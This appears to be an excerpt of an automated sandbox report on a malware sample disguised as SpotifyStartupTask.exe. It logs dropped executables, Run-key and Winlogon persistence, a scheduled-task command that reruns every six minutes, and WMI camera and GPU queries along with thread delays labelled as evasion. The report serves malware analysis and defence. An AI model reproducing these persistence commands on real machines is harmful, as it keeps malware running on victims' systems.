                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Users\user\Desktop\vRRUHqel.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File created: C:\Users\user\Desktop\PMosVZFV.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File created: C:\Users\user\Desktop\clyyMyKw.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Users\user\Desktop\GFwKqCZT.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Users\user\Desktop\DUQujoOa.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Users\user\Desktop\XUwHpYfn.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Users\user\Desktop\YjeiZtnk.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File created: C:\Users\user\Desktop\wcHMhvIM.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe File created: C:\Users\user\Desktop\eKApnDyW.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File created: C:\Users\user\Desktop\sMvnZGVS.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe File created: C:\Users\user\Desktop\YqxhFSUC.log

                              Boot Survival

                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JNXeqwRJ1WmUZ
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SpotifyStartupTask
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PQ4HCWgZazguIsFyU1PhJ
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dxLy2s6A
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "JNXeqwRJ1WmUZJ" /sc MINUTE /mo 6 /tr "'C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe'" /f
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dxLy2s6A
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SpotifyStartupTask
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\DiagTrack\dwm.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe Process information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe Process information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: F10000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 1090000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 1ADB0000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 9E0000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\dwm.exeMemory allocated: 1A600000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: BC0000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: 1A970000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: 1120000 memory reserve | memory write watch
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeMemory allocated: 1AB60000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 14E0000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 1AEA0000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 2790000 memory reserve | memory write watch
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeMemory allocated: 1A930000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 16B0000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 730000 memory reserve | memory write watch
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeMemory allocated: 1A3D0000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: F50000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: 1A910000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: D30000 memory reserve | memory write watch
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeMemory allocated: 1A9B0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: DC0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: 1A890000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: 9F0000 memory reserve | memory write watch
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeMemory allocated: 1A470000 memory reserve | memory write watch
                              Source: C:\Windows\DiagTrack\dwm.exeCode function: 24_2_00007FF88B505FDC sldt word ptr [eax]24_2_00007FF88B505FDC
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599874
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599764
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599655
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599547
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599437
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599324
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597500
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597382
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597265
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597156
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599875
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599438
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 3600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598938
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598766
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597985
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597860
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597749
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597640
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597526
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597415
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597130
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597016
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596820
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596642
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596500
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 300000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596375
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596266
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596141
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596031
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595890
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595594
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595465
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595355
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593344
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593230
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593124
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593013
